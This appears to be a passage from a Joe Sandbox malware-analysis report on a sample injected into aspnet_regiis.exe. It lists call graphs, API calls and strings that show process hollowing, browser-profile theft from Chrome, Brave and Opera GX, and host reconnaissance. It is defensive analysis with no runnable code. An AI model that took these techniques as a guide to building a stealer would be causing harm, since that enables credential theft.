2a16e97 76397->77104 76907->75591 76909 2a1d016 ___init_ctype 5 API calls 76908->76909 76910 2a12601 76909->76910 76910->74805 76910->74812 76912 2a104e7 lstrcpy 76911->76912 76913 2a02a05 76912->76913 76913->75639 76915 2a104e7 lstrcpy 76914->76915 76916 2a02a16 76915->76916 76916->75639 76918 2a104e7 lstrcpy 76917->76918 76919 2a02a27 76918->76919 76919->75639 76921 2a10519 lstrcpy 76920->76921 76922 2a16dac 76921->76922 76923 2a10519 lstrcpy 76922->76923 76924 2a16db7 76923->76924 76925 2a10519 lstrcpy 76924->76925 76926 2a16dc2 76925->76926 76926->75693 76927->75639 76928->75639 76929->75639 76931 2a116ad 76930->76931 76932 2a1173c 76930->76932 76934 2a104e7 lstrcpy 76931->76934 76933 2a104e7 lstrcpy 76932->76933 76935 2a11748 76933->76935 76936 2a116c0 _memset 76934->76936 76937 2a1d016 ___init_ctype 5 API calls 76935->76937 76947 2a123d5 lstrcpy malloc strncpy 76936->76947 76938 2a11755 76937->76938 76938->75715 76940 2a116ea lstrcat 76948 2a02920 76940->76948 76942 2a11707 lstrcat 76943 2a11724 76942->76943 76944 2a104e7 lstrcpy 76943->76944 76945 2a11732 76944->76945 76945->76935 76946->75718 76947->76940 76949 2a02924 76948->76949 76949->76942 76951 2a04ac4 76950->76951 76951->76951 76952 2a04acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlen InternetCrackUrlA 76951->76952 76953 2a04b27 76952->76953 76953->75727 76955 2a27068 76954->76955 76955->76032 76955->76955 76957 2a0806a LocalAlloc 76956->76957 76958 2a06724 76956->76958 76957->76958 76959 2a0807a CryptStringToBinaryA 76957->76959 76958->75895 76958->75907 76959->76958 76960 2a08091 LocalFree 76959->76960 76960->76958 76962 2a1d016 ___init_ctype 5 API calls 76961->76962 76963 2a10d2c 76962->76963 76963->76087 77121 2a23c10 76964->77121 76967 2a11651 RegCloseKey CharToOemA 76969 2a1d016 ___init_ctype 5 API calls 76967->76969 76968 2a11630 RegQueryValueExA 76968->76967 76970 2a11682 76969->76970 76970->76101 76972 2a12294 76971->76972 76973 2a12278 K32GetModuleFileNameExA CloseHandle 76971->76973 76974 2a104e7 lstrcpy 76972->76974 76973->76972 76975 2a122a0 76974->76975 76976 2a1d016 ___init_ctype 5 API calls 76975->76976 76977 2a122ae 76976->76977 76977->76144 77123 2a10c16 76978->77123 76981 2a10b63 RegOpenKeyExA 76983 2a10b83 RegQueryValueExA 76981->76983 76984 2a10b9b RegCloseKey 76981->76984 76982 2a10b5c 76982->76166 76983->76984 76984->76982 77130 2a2f109 76985->77130 76987 2a11813 CoInitializeEx CoInitializeSecurity CoCreateInstance 76988 2a1186b 76987->76988 76989 2a11873 CoSetProxyBlanket 76988->76989 76991 2a11964 76988->76991 76995 2a118a3 76989->76995 76990 2a104e7 lstrcpy 76992 2a1198f 76990->76992 76991->76990 76993 2a2f165 5 API calls 76992->76993 76994 2a11996 76993->76994 76994->76180 76995->76991 76996 2a118d7 VariantInit 76995->76996 76997 2a118f6 76996->76997 77131 2a11757 76997->77131 76999 2a11901 FileTimeToSystemTime GetProcessHeap RtlAllocateHeap wsprintfA 77000 2a104e7 lstrcpy 76999->77000 77001 2a11958 VariantClear 77000->77001 77001->76992 77140 2a2f09d 77002->77140 77004 2a119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 77005 2a119f9 77004->77005 77006 2a11a01 CoSetProxyBlanket 77005->77006 77007 2a11a93 77005->77007 77008 2a11a31 77006->77008 77009 2a104e7 lstrcpy 77007->77009 77008->77007 77011 2a11a59 VariantInit 77008->77011 77010 2a11abe 77009->77010 77010->76193 77012 2a11a78 77011->77012 77141 2a11d42 LocalAlloc CharToOemW 77012->77141 77014 2a11a80 77015 2a104e7 lstrcpy 77014->77015 77016 2a11a87 VariantClear 77015->77016 77016->77010 77017->76221 77019 2a104e7 lstrcpy 77018->77019 77020 2a115cd 77019->77020 77020->76236 77022 2a104e7 lstrcpy 77021->77022 77023 2a10e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 77022->77023 77030 2a10e3c 77023->77030 77032 2a10eed 77023->77032 77024 2a10e42 GetLocaleInfoA 77024->77030 77025 2a10f05 77027 2a1d016 ___init_ctype 5 API calls 77025->77027 77026 2a10ef9 LocalFree 77026->77025 77029 2a10f15 77027->77029 77028 2a10609 lstrlen lstrcpy lstrcat 77028->77030 77029->76250 77030->77024 77030->77028 77031 2a1058d lstrcpy 77030->77031 77030->77032 77031->77030 77032->77025 77032->77026 77034 2a10d86 77033->77034 77035 2a10d6a wsprintfA 77033->77035 77036 2a1d016 ___init_ctype 5 API calls 77034->77036 77035->77034 77037 2a10d93 77036->77037 77037->76278 77039 2a10f94 RegQueryValueExA 77038->77039 77040 2a10fac RegCloseKey 77038->77040 77039->77040 77040->76295 77042 2a1107c GetLogicalProcessorInformationEx 77041->77042 77043 2a11087 77042->77043 77044 2a11048 GetLastError 77042->77044 77144 2a11b5b GetProcessHeap HeapFree 77043->77144 77045 2a110f3 77044->77045 77054 2a11057 77044->77054 77047 2a110ec 77045->77047 77145 2a11b5b GetProcessHeap HeapFree 77045->77145 77052 2a1d016 ___init_ctype 5 API calls 77047->77052 77048 2a110c0 77048->77047 77053 2a110c9 wsprintfA 77048->77053 77055 2a11117 77052->77055 77053->77047 77054->77042 77054->77047 77142 2a11b5b GetProcessHeap HeapFree 77054->77142 77143 2a11b78 GetProcessHeap RtlAllocateHeap 77054->77143 77055->76310 77057 2a1d016 ___init_ctype 5 API calls 77056->77057 77058 2a11005 77057->77058 77058->76324 77146 2a11b26 77059->77146 77062 2a1115f wsprintfA 77064 2a1d016 ___init_ctype 5 API calls 77062->77064 77065 2a11190 77064->77065 77065->76338 77067 2a104e7 lstrcpy 77066->77067 77070 2a111b3 77067->77070 77068 2a111df EnumDisplayDevicesA 77069 2a111f3 77068->77069 77068->77070 77072 2a1d016 ___init_ctype 5 API calls 77069->77072 77070->77068 77070->77069 77071 2a10549 2 API calls 77070->77071 77071->77070 77073 2a11201 77072->77073 77073->76352 77075 2a104e7 lstrcpy 77074->77075 77076 2a114c6 CreateToolhelp32Snapshot Process32First 77075->77076 77077 2a1154c CloseHandle 77076->77077 77081 2a114ee 77076->77081 77079 2a1d016 ___init_ctype 5 API calls 77077->77079 77078 2a1153a Process32Next 77078->77077 77078->77081 77080 2a11561 77079->77080 77080->76366 77081->77078 77082 2a10609 lstrlen lstrcpy lstrcat 77081->77082 77083 2a1058d lstrcpy 77081->77083 77082->77081 77083->77081 77085 2a104e7 lstrcpy 77084->77085 77086 2a1123b RegOpenKeyExA 77085->77086 77087 2a11478 77086->77087 77102 2a11281 77086->77102 77089 2a10519 lstrcpy 77087->77089 77088 2a11287 RegEnumKeyExA 77090 2a112c4 wsprintfA RegOpenKeyExA 77088->77090 77088->77102 77091 2a11489 77089->77091 77093 2a11460 RegCloseKey 77090->77093 77094 2a1130a RegQueryValueExA 77090->77094 77098 2a1d016 ___init_ctype 5 API calls 77091->77098 77092 2a1145e 77095 2a1146c RegCloseKey 77092->77095 77093->77095 77096 2a11440 RegCloseKey 77094->77096 77097 2a11340 lstrlen 77094->77097 77095->77087 77096->77102 77097->77096 77097->77102 77099 2a114a3 77098->77099 77099->76380 77100 2a1058d lstrcpy 77100->77102 77101 2a113b0 RegQueryValueExA 77101->77096 77101->77102 77102->77088 77102->77092 77102->77096 77102->77100 77102->77101 77103 2a10609 lstrlen lstrcpy lstrcat 77102->77103 77103->77102 77105 2a16ea7 77104->77105 77106 2a1058d lstrcpy 77105->77106 77107 2a16ec4 77106->77107 77108 2a1058d lstrcpy 77107->77108 77109 2a16ee0 77108->77109 77110 2a1058d lstrcpy 77109->77110 77111 2a16eeb 77110->77111 77112 2a1058d lstrcpy 77111->77112 77113 2a16ef6 77112->77113 77122 2a1160c RegOpenKeyExA 77121->77122 77122->76967 77122->76968 77126 2a10ba9 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 77123->77126 77125 2a10b58 77125->76981 77125->76982 77127 2a10c03 RegCloseKey 77126->77127 77128 2a10bec RegQueryValueExA 77126->77128 77129 2a10c13 77127->77129 77128->77127 77129->77125 77130->76987 77139 2a2f09d 77131->77139 77133 2a11763 CoCreateInstance 77134 2a1178b SysAllocString 77133->77134 77135 2a117e7 77133->77135 77134->77135 77136 2a1179a 77134->77136 77135->76999 77137 2a117e0 SysFreeString 77136->77137 77138 2a117be _wtoi64 SysFreeString 77136->77138 77137->77135 77138->77137 77139->77133 77140->77004 77141->77014 77142->77054 77143->77054 77144->77048 77145->77047 77147 2a1114d GlobalMemoryStatusEx 77146->77147 77147->77062

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 02A18950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                              • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                              • API String ID: 2238633743-2740034357
                                                                                                                                                                              • Opcode ID: 4c37a75f0768fff032cc05448686b38d0de3d4cc4270b7d6cb71c5a292e2fc5f
                                                                                                                                                                              • Instruction ID: 599408f7056406c76ec3cd0f60ee994cd94ec788e4a2595494b1b835787c185b
                                                                                                                                                                              • Opcode Fuzzy Hash: 4c37a75f0768fff032cc05448686b38d0de3d4cc4270b7d6cb71c5a292e2fc5f
                                                                                                                                                                              • Instruction Fuzzy Hash: 4852FB75C90332AFDB065FA0F948B243BA6F71C6013518F66E916A2261E732C6F4EF15
                                                                                                                                                                              Function 02A14CC8 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 818 2a14cc8-2a14d6f call 2a2e390 wsprintfA FindFirstFileA call 2a23c10 * 2 825 2a14d75-2a14d89 StrCmpCA 818->825 826 2a1512b-2a15141 call 2a01cde call 2a1d016 818->826 827 2a150f8-2a1510d FindNextFileA 825->827 828 2a14d8f-2a14da3 StrCmpCA 825->828 830 2a1511f-2a15125 FindClose 827->830 831 2a1510f-2a15111 827->831 828->827 832 2a14da9-2a14deb wsprintfA StrCmpCA 828->832 830->826 831->825 834 2a14e0a-2a14e1c wsprintfA 832->834 835 2a14ded-2a14e08 wsprintfA 832->835 837 2a14e1f-2a14e5c call 2a23c10 lstrcat 834->837 835->837 841 2a14e82-2a14e89 strtok_s 837->841 842 2a14e8b-2a14ec9 call 2a23c10 lstrcat strtok_s 841->842 843 2a14e5e-2a14e6f 841->843 848 2a15089-2a1508d 842->848 849 2a14ecf-2a14edf PathMatchSpecA 842->849 847 2a14e75-2a14e81 843->847 843->848 847->841 848->827 852 2a1508f-2a15095 848->852 850 2a14ee5-2a14fbe call 2a104e7 call 2a11c4a call 2a10609 call 2a105c7 call 2a10609 call 2a105c7 call 2a1058d call 2a02920 * 5 DeleteFileA CopyFileA call 2a12166 call 2a2efc0 849->850 851 2a14fd9-2a14fee strtok_s 849->851 888 2a14fc0-2a14fd4 DeleteFileA call 2a02920 850->888 889 2a14ff9-2a15005 850->889 851->849 854 2a14ff4 851->854 852->830 855 2a1509b-2a150a9 852->855 854->848 855->827 856 2a150ab-2a150ed call 2a01cfd call 2a14cc8 855->856 864 2a150f2 856->864 864->827 888->851 891 2a15116-2a1511d call 2a02920 889->891 892 2a1500b-2a15031 call 2a10519 call 2a07fac 889->892 891->826 900 2a15033-2a15077 call 2a01cfd call 2a104e7 call 2a16e97 call 2a02920 892->900 901 2a1507d-2a15084 call 2a02920 892->901 900->901 901->848
                                                                                                                                                                              APIs
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A14D1C
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02A14D33
                                                                                                                                                                              • _memset.LIBCMT ref: 02A14D4F
                                                                                                                                                                              • _memset.LIBCMT ref: 02A14D60
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A369F8), ref: 02A14D81
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A369FC), ref: 02A14D9B
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A14DC2
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3660F), ref: 02A14DD6
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A14DFF
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A14E16
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • _memset.LIBCMT ref: 02A14E28
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A14E3D
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A14E82
                                                                                                                                                                              • _memset.LIBCMT ref: 02A14E94
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A14EA9
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A14EC2
                                                                                                                                                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02A14ED7
                                                                                                                                                                              • DeleteFileA.KERNEL32(?,02A36A28,02A3661D), ref: 02A14F90
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A14FA0
                                                                                                                                                                                • Part of subcall function 02A12166: CreateFileA.KERNEL32(02A14FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,02A14FAC,?), ref: 02A12181
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A14FB6
                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 02A14FC1
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A14FE7
                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 02A15105
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A15125
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                              • API String ID: 956187361-332874205
                                                                                                                                                                              • Opcode ID: d7667292521a7296a746854aecd4423a62ccb4594da1c6329b23b45095620722
                                                                                                                                                                              • Instruction ID: 9540589eccca80a9b48f12bb79061c1b0506d95856434cc087a67a995372d777
                                                                                                                                                                              • Opcode Fuzzy Hash: d7667292521a7296a746854aecd4423a62ccb4594da1c6329b23b45095620722
                                                                                                                                                                              • Instruction Fuzzy Hash: 19C12972D4022AAFDF22AF64DD85AEE777DAF08314F4045A1FA09B2140DB35DB998F50
                                                                                                                                                                              Function 02A09D1C Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1437 2a09d1c-2a09dd5 call 2a104e7 call 2a105c7 call 2a10609 call 2a1058d call 2a02920 * 2 call 2a104e7 * 2 FindFirstFileA 1454 2a0a788-2a0a7d7 call 2a02920 * 3 call 2a01cde call 2a02920 * 3 call 2a1d016 1437->1454 1455 2a09ddb-2a09def StrCmpCA 1437->1455 1457 2a0a761-2a0a776 FindNextFileA 1455->1457 1458 2a09df5-2a09e09 StrCmpCA 1455->1458 1457->1455 1459 2a0a77c-2a0a782 FindClose 1457->1459 1458->1457 1461 2a09e0f-2a09e85 call 2a10549 call 2a105c7 call 2a10609 * 2 call 2a1058d call 2a02920 * 3 1458->1461 1459->1454 1492 2a09e8b-2a09ea1 StrCmpCA 1461->1492 1493 2a09f8e-2a0a002 call 2a10609 * 4 call 2a1058d call 2a02920 * 3 1461->1493 1494 2a09ea3-2a09f13 call 2a10609 * 4 call 2a1058d call 2a02920 * 3 1492->1494 1495 2a09f18-2a09f8c call 2a10609 * 4 call 2a1058d call 2a02920 * 3 1492->1495 1544 2a0a008-2a0a01d call 2a02920 StrCmpCA 1493->1544 1494->1544 1495->1544 1547 2a0a023-2a0a037 StrCmpCA 1544->1547 1548 2a0a1ef-2a0a204 StrCmpCA 1544->1548 1547->1548 1551 2a0a03d-2a0a173 call 2a104e7 call 2a11c4a call 2a10609 call 2a105c7 call 2a10609 call 2a105c7 call 2a1058d call 2a02920 * 5 CopyFileA call 2a104e7 call 2a10609 * 2 call 2a1058d call 2a02920 * 2 call 2a10519 call 2a07fac 1547->1551 1549 2a0a206-2a0a249 call 2a01cfd call 2a10519 * 3 call 2a0852e 1548->1549 1550 2a0a259-2a0a26e StrCmpCA 1548->1550 1614 2a0a24e-2a0a254 1549->1614 1552 2a0a270-2a0a281 StrCmpCA 1550->1552 1553 2a0a2cf-2a0a2e9 call 2a10519 call 2a11d92 1550->1553 1733 2a0a175-2a0a1b3 call 2a01cfd call 2a10519 call 2a16e97 call 2a02920 1551->1733 1734 2a0a1b8-2a0a1ea DeleteFileA call 2a02920 * 3 1551->1734 1556 2a0a6d0-2a0a6d7 1552->1556 1557 2a0a287-2a0a28b 1552->1557 1584 2a0a2eb-2a0a2ef 1553->1584 1585 2a0a34f-2a0a364 StrCmpCA 1553->1585 1565 2a0a731-2a0a75b call 2a02920 * 2 1556->1565 1566 2a0a6d9-2a0a726 call 2a01cfd call 2a10519 * 2 call 2a104e7 call 2a09d1c 1556->1566 1557->1556 1562 2a0a291-2a0a2cd call 2a01cfd call 2a10519 * 2 1557->1562 1612 2a0a335-2a0a33f call 2a10519 call 2a0884c 1562->1612 1565->1457 1630 2a0a72b 1566->1630 1584->1556 1586 2a0a2f5-2a0a32f call 2a01cfd call 2a10519 call 2a104e7 1584->1586 1591 2a0a546-2a0a55b StrCmpCA 1585->1591 1592 2a0a36a-2a0a426 call 2a104e7 call 2a11c4a call 2a10609 call 2a105c7 call 2a10609 call 2a105c7 call 2a1058d call 2a02920 * 5 CopyFileA 1585->1592 1586->1612 1591->1556 1598 2a0a561-2a0a61d call 2a104e7 call 2a11c4a call 2a10609 call 2a105c7 call 2a10609 call 2a105c7 call 2a1058d call 2a02920 * 5 CopyFileA 1591->1598 1689 2a0a4b9-2a0a4c9 StrCmpCA 1592->1689 1690 2a0a42c-2a0a4ae call 2a01cfd call 2a10519 * 3 call 2a08ddb call 2a01cfd call 2a10519 * 3 call 2a09549 1592->1690 1692 2a0a623-2a0a69e call 2a01cfd call 2a10519 * 3 call 2a09072 call 2a01cfd call 2a10519 * 3 call 2a092a7 1598->1692 1693 2a0a6a4-2a0a6b6 DeleteFileA call 2a02920 1598->1693 1636 2a0a344-2a0a34a 1612->1636 1614->1556 1630->1565 1636->1556 1695 2a0a4cb-2a0a516 call 2a01cfd call 2a10519 * 3 call 2a09a0e 1689->1695 1696 2a0a51c-2a0a52e DeleteFileA call 2a02920 1689->1696 1772 2a0a4b3 1690->1772 1692->1693 1708 2a0a6bb-2a0a6c2 1693->1708 1695->1696 1707 2a0a533-2a0a541 1696->1707 1713 2a0a6c9-2a0a6cb call 2a02920 1707->1713 1708->1713 1713->1556 1733->1734 1734->1548 1772->1689
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,02A367F2,02A367EF,02A37324,02A367EE,?,?,?), ref: 02A09DC6
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37328), ref: 02A09DE7
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3732C), ref: 02A09E01
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX,02A37330,?,02A367F3), ref: 02A09E93
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Brave,02A37350,02A37354,02A37330,?,02A367F3), ref: 02A0A015
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 02A0A02F
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0A0EF
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0A1BE
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0A1FC
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0A266
                                                                                                                                                                              • StrCmpCA.SHLWAPI(02A0CCE9), ref: 02A0A279
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0A35C
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0A41C
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 02A0A4C1
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0A522
                                                                                                                                                                                • Part of subcall function 02A08DDB: lstrlen.KERNEL32(?), ref: 02A08FD4
                                                                                                                                                                                • Part of subcall function 02A08DDB: lstrlen.KERNEL32(?), ref: 02A08FEF
                                                                                                                                                                                • Part of subcall function 02A09549: lstrlen.KERNEL32(?), ref: 02A09970
                                                                                                                                                                                • Part of subcall function 02A09549: lstrlen.KERNEL32(?), ref: 02A0998B
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A0A553
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0A613
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0A6AA
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A0A76E
                                                                                                                                                                              • FindClose.KERNELBASE(?), ref: 02A0A782
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
